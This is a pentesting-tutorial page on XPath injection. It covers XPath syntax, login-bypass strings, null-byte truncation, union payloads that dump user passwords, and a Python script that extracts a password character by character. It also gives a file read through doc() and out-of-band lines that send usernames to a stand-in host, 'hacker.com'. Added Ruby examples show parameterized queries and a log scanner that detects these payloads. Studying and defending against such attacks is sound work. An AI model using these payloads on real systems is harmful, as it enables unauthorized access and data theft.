hacktricks/pentesting-web/xpath-injection.md
2024-02-10 17:52:19 +00:00


XPATH injection


Basic Syntax

An attack technique known as XPath Injection is utilized to take advantage of applications that form XPath (XML Path Language) queries based on user input to query or navigate XML documents.

Nodes Described

Expressions are used to select various nodes in an XML document. These expressions and their descriptions are summarized below:

  • nodename: All nodes with the name "nodename" are selected.
  • /: Selection is made from the root node.
  • //: Nodes matching the selection from the current node are selected, regardless of their location in the document.
  • .: The current node is selected.
  • ..: The parent of the current node is selected.
  • @: Attributes are selected.

XPath Examples

Examples of path expressions and their results include:

  • bookstore: All nodes named "bookstore" are selected.
  • /bookstore: The root element bookstore is selected. It's noted that an absolute path to an element is represented by a path starting with a slash (/).
  • bookstore/book: All book elements that are children of bookstore are selected.
  • //book: All book elements in the document are selected, irrespective of their location.
  • bookstore//book: All book elements that are descendants of the bookstore element are selected, no matter their position under the bookstore element.
  • //@lang: All attributes named lang are selected.

Utilization of Predicates

Predicates are used to refine selections:

  • /bookstore/book[1]: The first book element child of the bookstore element is selected. A workaround for IE versions 5 to 9, which index the first node as [0], is setting the SelectionLanguage to XPath through JavaScript.
  • /bookstore/book[last()]: The last book element child of the bookstore element is selected.
  • /bookstore/book[last()-1]: The penultimate book element child of the bookstore element is selected.
  • /bookstore/book[position()<3]: The first two book elements children of the bookstore element are selected.
  • //title[@lang]: All title elements with a lang attribute are selected.
  • //title[@lang='en']: All title elements with a "lang" attribute value of "en" are selected.
  • /bookstore/book[price>35.00]: All book elements of the bookstore with a price greater than 35.00 are selected.
  • /bookstore/book[price>35.00]/title: All title elements of the book elements of the bookstore with a price greater than 35.00 are selected.

Handling of Unknown Nodes

Wildcards are employed for matching unknown nodes:

  • *: Matches any element node.
  • @*: Matches any attribute node.
  • node(): Matches any node of any kind.

Further examples include:

  • /bookstore/*: Selects all the child element nodes of the bookstore element.
  • //*: Selects all elements in the document.
  • //title[@*]: Selects all title elements with at least one attribute of any kind.

Example

<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
  <user>
    <name>pepe</name>
    <password>peponcio</password>
    <account>admin</account>
  </user>
  <user>
    <name>mark</name>
    <password>m12345</password>
    <account>regular</account>
  </user>
  <user>
    <name>fino</name>
    <password>fino2</password>
    <account>regular</account>
  </user>
</data>

Access the information

XPath injection is a technique used to exploit vulnerabilities in web applications that use XPath queries to retrieve data from XML documents. By injecting malicious input into the XPath query, an attacker can manipulate the query to access unauthorized information.

To access sensitive information using XPath injection, an attacker needs to identify a vulnerable input field that is used in an XPath query. This can be a search box, a login form, or any other input field that is used to construct an XPath query.

Once a vulnerable input field is identified, the attacker can start injecting malicious input to modify the XPath query. The goal is to construct a query that will return the desired information. This can be achieved by manipulating the query to bypass authentication mechanisms, access restricted data, or retrieve confidential information.

To successfully exploit XPath injection, an attacker needs to have a good understanding of the application's XPath query structure and the underlying XML document. By carefully crafting the injected input, the attacker can control the query and retrieve the desired information.

It is important for developers to implement proper input validation and sanitization techniques to prevent XPath injection attacks. This includes validating and sanitizing user input, using parameterized queries, and implementing access controls to restrict unauthorized access to sensitive information.

By understanding the techniques and countermeasures for XPath injection, security professionals can effectively identify and mitigate these vulnerabilities in web applications.

All names - [pepe, mark, fino]
name
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name

All values - [pepe, peponcio, admin, mark, ...]
//user/node()
//user/child::node()


Positions
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)

Functions
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substring(//user[position()=2]/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"

Identify & steal the schema

Identifying XPath injection

To find an injection point:

  1. Manual testing: inject characters that break the expression (a single or double quote, a closing bracket) into fields that end up in XPath queries and watch for errors or changed results, then confirm with the boolean conditions shown in the Blind Exploitation section.

  2. Automated scanning: tools such as OWASP ZAP or Burp Suite include XPath injection checks and help locate candidate fields for manual follow-up.

  3. Error-based testing: if the application reflects XPath parser errors, the messages often reveal the structure of the expression being built around the input.

Stealing the schema

XPath has no UNION SELECT and no information schema; the structure of the XML document has to be recovered by asking questions about it:

  1. Blind: count() on wildcard paths tells how many children each node has, and name() combined with substring() or string-to-codepoints() reveals tag names one character at a time, as in the payloads below.

  2. Error-based: if error messages are reflected, an expression that only raises an error when a condition holds can replace the true/false comparison.

  3. Out-of-band: on XPath 2.0 engines, doc() or doc-available() can be made to fetch a URL that carries node names, which leaks the structure without reading any response.

Knowing the structure lets later payloads target specific nodes, which is why the rest of this page assumes the document layout is known.

and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/*[1]/*) = 0 #count(g) = 0

#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but just the schema)
<root>
  <a>
    <b></b>
  </a>
  <c>
    <d></d>
    <e></e>
    <f>
      <g></g>
    </f>
  </c>
</root>

and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #First char of tag `<b>` is codepoint 105 ("i") (https://codepoints.net/)

#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))

Authentication Bypass

Example of queries:

string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';

OR bypass in user and password (same value in both)

' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())

Select account
Select the account using the username and use one of the previous values in the password field
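Added example, not part of the HackTricks page: the login query above built by string concatenation, beside two hardened forms, run with Ruby's standard REXML engine against the page's sample document. The hardened version binds the input through REXML's XPath `variables` argument (a parameterized query); `xpath_literal` is an assumed helper for engines without variable binding. The predicate is simplified to `name=`/`password=` instead of `name/text()=`.

```ruby
require "rexml/document"
require "rexml/xpath"

# The page's sample document, embedded so the example runs offline.
USERS_XML = <<~XML
  <data>
    <user><name>pepe</name><password>peponcio</password><account>admin</account></user>
    <user><name>mark</name><password>m12345</password><account>regular</account></user>
    <user><name>fino</name><password>fino2</password><account>regular</account></user>
  </data>
XML
DOC = REXML::Document.new(USERS_XML)

# Vulnerable: the login query from the page, built by string concatenation.
# An input such as  ' or '1'='1  in both fields turns the predicate into
# name='' or '1'='1' and password='' or '1'='1', which is true for every user,
# so the first account (admin) comes back without a valid password.
def account_for_vulnerable(user, pass)
  expr = "//user[name='#{user}' and password='#{pass}']/account"
  node = REXML::XPath.first(DOC, expr)
  node && node.text
end

# Hardened (parameterized query): the same lookup with the input bound as
# XPath variables. REXML substitutes $u and $p as values, never as expression
# text, so quotes and "or" inside the input cannot change the query structure.
def account_for_hardened(user, pass)
  expr = "//user[name=$u and password=$p]/account"
  node = REXML::XPath.first(DOC, expr, {}, { "u" => user, "p" => pass })
  node && node.text
end

# For engines without variable binding: build a safe XPath 1.0 string literal.
# XPath 1.0 has no escape sequence for quotes, so a value holding both kinds
# is split on single quotes and reassembled with concat(). Control characters
# (including the null byte used for the truncation trick on this page) are
# rejected outright instead of being passed to the engine.
def xpath_literal(value)
  raise ArgumentError, "control character in XPath input" if value.match?(/[\x00-\x1f]/)
  return "'#{value}'" unless value.include?("'")
  return "\"#{value}\"" unless value.include?('"')
  parts = value.split("'", -1).map { |p| "'#{p}'" }
  "concat(#{parts.join(%q{, "'", })})"
end

def account_for_quoted(user, pass)
  expr = "//user[name=#{xpath_literal(user)} and password=#{xpath_literal(pass)}]/account"
  node = REXML::XPath.first(DOC, expr)
  node && node.text
end

if __FILE__ == $PROGRAM_NAME
  inj = "' or '1'='1"
  puts "vulnerable: #{account_for_vulnerable(inj, inj).inspect}" # "admin"
  puts "hardened:   #{account_for_hardened(inj, inj).inspect}"   # nil
  puts "quoted:     #{account_for_quoted(inj, inj).inspect}"     # nil
end
```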

Abusing null injection


Description

Some XPath engines, or the host-language glue that concatenates the strings, stop reading a string at a null character (\x00). When user input is pasted into an XPath expression, a null byte placed right after the injected fragment discards everything the application appends afterwards: the closing quote and bracket, and any second condition such as the password check.

Exploitation

That trailing part of the query is normally what keeps a single injected quote from forming a valid expression, so truncating it makes one controlled field enough. Consider the following vulnerable XPath query:

//users/user[name='$input']

With the input

' or 1]%00

the expression the engine actually evaluates is

//users/user[name='' or 1]

The `']` the application appends is cut off, `or 1` makes the predicate true for every node, and all user records are returned.

Prevention

Bind user input as XPath variables (parameterized queries) or escape it properly instead of concatenating it, and reject control characters, null bytes included, before the value reaches the query.

Additionally, apply least privilege: the XML documents and any doc() access reachable from the query engine should be limited to what the application needs, which bounds the impact of a successful injection.



Username: ' or 1]%00

Double OR in Username or in password (is valid with only 1 vulnerable field)


Bypass with first match
(These requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())

Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select the 2nd account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())

Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())

String extraction

When the application reflects the strings it selects, the injected value can close the predicate and append further node sets with the `|` union operator, so the extra nodes are printed alongside the expected result:

/user/username[contains(., '+VALUE+')]
') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users

Blind Exploitation

Get the length of a value and extract it character by character through comparisons:

' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True if the first char equals "a"

substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it raises an error and never returns a value

Python Example

import requests, string

flag = ""
l = 0
alphabet = string.ascii_letters + string.digits + "{}_()"
# Step 1: find the length of the value by asking string-length(password)=i for increasing i
for i in range(30):
    r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i))
    if "TRUE_COND" in r.text:
        l = i
        break
print("[+] Password length: " + str(l))
# Step 2: extract one character at a time; the candidate char must be an XPath string literal
for i in range(1, l + 1):
    #print("[i] Looking for char number " + str(i))
    for al in alphabet:
        r = requests.get("http://example.com?action=user&userid=2 and substring(password," + str(i) + ",1)='" + al + "'")
        if "TRUE_COND" in r.text:
            flag += al
            print("[+] Flag: " + flag)
            break

Read file

If the engine supports doc() with file: URIs, local files can be opened and their content tested with the same blind comparisons:

(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127

OOB Exploitation

Introduction

Out-of-Band (OOB) exploitation is a technique used in XPath Injection attacks to extract data from a vulnerable web application. XPath Injection occurs when an attacker is able to manipulate the XPath query used by the application to retrieve data from an XML database.
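The root cause described above (the application builds the XPath query text out of user input) and the fix a defender would apply are easiest to see side by side. The following is an added example, not code from HackTricks: a login lookup against a constructed two-employee XML document, first with string concatenation and then with the query kept constant and the values bound as XPath variables through REXML's variables hash. The XML, the credentials and the `$u`/`$p` variable names are all assumptions made for the illustration.

```ruby
require "rexml/document"

# Constructed sample data (not from the page): a tiny employee store of the
# kind an XPath-backed login would query.
EMPLOYEES_XML = <<~XML
  <Employees>
    <Employee id="1"><username>alice</username><password>s3cret</password></Employee>
    <Employee id="2"><username>bob</username><password>hunter2</password></Employee>
  </Employees>
XML

DOC = REXML::Document.new(EMPLOYEES_XML)

# Vulnerable form: the caller's input is spliced into the query text, so a
# single quote in the input ends the string literal and the rest of the
# input becomes XPath syntax. Returns the ids of every Employee matched.
def lookup_vulnerable(user, pass)
  expr = "//Employee[username='#{user}' and password='#{pass}']"
  REXML::XPath.match(DOC, expr).map { |e| e.attributes["id"] }
end

# Hardened form: the query text is a constant; the values are passed in
# REXML's variables hash and referenced as $u and $p, so they are only ever
# compared as strings and cannot change the structure of the predicate.
def lookup_hardened(user, pass)
  expr = "//Employee[username=$u and password=$p]"
  REXML::XPath.match(DOC, expr, {}, { "u" => user, "p" => pass })
              .map { |e| e.attributes["id"] }
end

if $PROGRAM_NAME == __FILE__
  payload = "' or '1'='1"
  puts "vulnerable, real creds: #{lookup_vulnerable('alice', 's3cret').inspect}"
  puts "vulnerable, payload:    #{lookup_vulnerable(payload, payload).inspect}"
  puts "hardened, real creds:   #{lookup_hardened('alice', 's3cret').inspect}"
  puts "hardened, payload:      #{lookup_hardened(payload, payload).inspect}"
end
```

With the concatenated form the classic quote-and-`or` input matches every Employee, because it turns the predicate into three alternatives of which the last is always true; with variable binding the same input is just a string that no username equals, so the result set is empty. The same fix applies in any XPath engine that supports variables (`XPathVariableResolver` in Java, `lxml`'s keyword arguments in Python); where the engine has none, a strict allowlist on the input is the fallback.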

OOB Exploitation Techniques

There are several OOB exploitation techniques that can be used in XPath Injection attacks:

  1. Blind OOB Exploitation: In this technique, the attacker injects a malicious payload into the XPath query, which triggers an out-of-band communication from the vulnerable application to an external server controlled by the attacker. The attacker can then analyze the communication to extract sensitive information.

  2. Time-based OOB Exploitation: In this technique, the attacker injects a payload that causes a delay in the application's response. By measuring the time it takes for the response to arrive, the attacker can infer whether the injected payload was successful or not.

  3. Error-based OOB Exploitation: In this technique, the attacker injects a payload that causes the application to generate an error message. The error message is then sent to an external server controlled by the attacker, allowing them to extract information from it.

OOB Exploitation Tools

There are several tools that can be used to perform OOB exploitation in XPath Injection attacks:

  • Burp Suite: Burp Suite is a popular web application testing tool that includes features for intercepting and modifying HTTP requests and responses. It can be used to inject payloads and analyze out-of-band communications.

  • OWASP ZAP: OWASP ZAP is another web application testing tool that can be used to intercept and modify HTTP requests and responses. It also includes features for detecting and exploiting XPath Injection vulnerabilities.

  • SQLMap: SQLMap is a powerful tool for detecting and exploiting SQL injection vulnerabilities. It can also be used to perform OOB exploitation in XPath Injection attacks.

Conclusion

OOB exploitation is a powerful technique that can be used to extract data from a vulnerable web application. By understanding the different OOB exploitation techniques and using the right tools, an attacker can successfully exploit XPath Injection vulnerabilities and extract sensitive information.

doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))

#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#doc-available() returns true or false depending on whether the document exists;
#use not(doc-available(...)) to invert the result if you need to
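From the defender's side, the OOB techniques listed in the section above and the doc()/doc-available() payloads just shown leave two traces: the request that carries the query fragment, and an outbound HTTP or DNS request from the XML-processing host to a domain it has no business contacting. The following added example (not HackTricks code) covers the first trace: it scans constructed access-log lines, URL-decodes each query string and grades it by the strongest indicator present, with functions that reach outside the document (`doc`, `doc-available`, a `file://` URL) ranked above the string helpers (`concat`, `encode-for-uri`, `substring`) and above bare quote-and-operator tampering. The log lines, the `example.invalid` host and the verdict names are assumptions.

```ruby
require "uri"

# Constructed access-log lines (not from the page). Lines 2, 4, 5 and 6 carry
# URL-encoded XPath fragments modelled on the payload shapes shown above;
# example.invalid stands in for an attacker-controlled host.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [10/Feb/2024:17:52:19 +0000] "GET /search?user=alice HTTP/1.1" 200 512
  10.0.0.5 - - [10/Feb/2024:17:52:20 +0000] "GET /search?user=x%27%5D+or+doc-available%28concat%28%22http%3A%2F%2Fexample.invalid%2Foob%2F%22%2Cusername%29%29+or+%27a%27%3D%27 HTTP/1.1" 200 512
  10.0.0.9 - - [10/Feb/2024:17:52:21 +0000] "POST /login HTTP/1.1" 302 0
  10.0.0.7 - - [10/Feb/2024:17:52:22 +0000] "GET /item?id=1%27%5D+and+substring%28doc%28%27file%3A%2F%2Fprotected%2Fsecret.xml%27%29%2F*%5B1%5D%2Ftext%28%29%2C1%2C1%29%3C127+and+%271%27%3D%271 HTTP/1.1" 500 88
  10.0.0.7 - - [10/Feb/2024:17:52:23 +0000] "GET /item?id=1%27%5D+and+substring%28username%2C1%2C1%29%3D%27a%27+and+%271%27%3D%271 HTTP/1.1" 200 512
  10.0.0.8 - - [10/Feb/2024:17:52:24 +0000] "GET /search?user=alice%27+or+%271%27%3D%271 HTTP/1.1" 200 4096
LOG

REQUEST_LINE = /"(?:GET|POST|PUT|DELETE|PATCH) (?<path>\S+) HTTP\/[\d.]+"/

# Functions that let a query leave the document (network or file system);
# their presence in a parameter is the strongest indicator.
OOB_CALL    = /\b(?:doc-available|doc)\s*\(/i
# Helpers used to carve out and encode extracted data for blind/OOB reads.
HELPER_CALL = /\b(?:concat|encode-for-uri|substring)\s*\(/i
# A quote closing a literal followed by a boolean operator: structural tampering.
QUOTE_OP    = /'\s*\]?\s*(?:or|and)\s+/i

# Returns the URL-decoded query string of a request path ("" if none).
def decode_query(path)
  _, query = path.split("?", 2)
  query ? URI.decode_www_form_component(query) : ""
end

# Returns :oob, :helper, :tamper or :clean for one decoded query string.
# Order matters: the most specific (and most severe) indicator wins.
def classify(decoded)
  return :oob    if decoded.match?(OOB_CALL) || decoded.include?("file://")
  return :helper if decoded.match?(HELPER_CALL)
  return :tamper if decoded.match?(QUOTE_OP)
  :clean
end

# Scans a log text and returns one finding hash per suspicious request.
def scan_log(text)
  text.each_line.filter_map do |line|
    m = REQUEST_LINE.match(line) or next
    decoded = decode_query(m[:path])
    verdict = classify(decoded)
    next if verdict == :clean
    { ip: line.split(" ", 2).first, path: m[:path].split("?", 2).first,
      verdict: verdict, decoded: decoded }
  end
end

if $PROGRAM_NAME == __FILE__
  scan_log(SAMPLE_LOG).each do |f|
    puts "#{f[:verdict].to_s.upcase.ljust(6)} #{f[:ip]} #{f[:path]} #{f[:decoded]}"
  end
end
```

The decode step is what makes the patterns usable: the payloads arrive percent-encoded, so matching the raw request line would miss them. For the second trace, pair this with egress logging or a DNS sink on the hosts that evaluate XPath, since a successful doc() call shows up there even when the HTTP response reveals nothing.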

Automatic tool

References
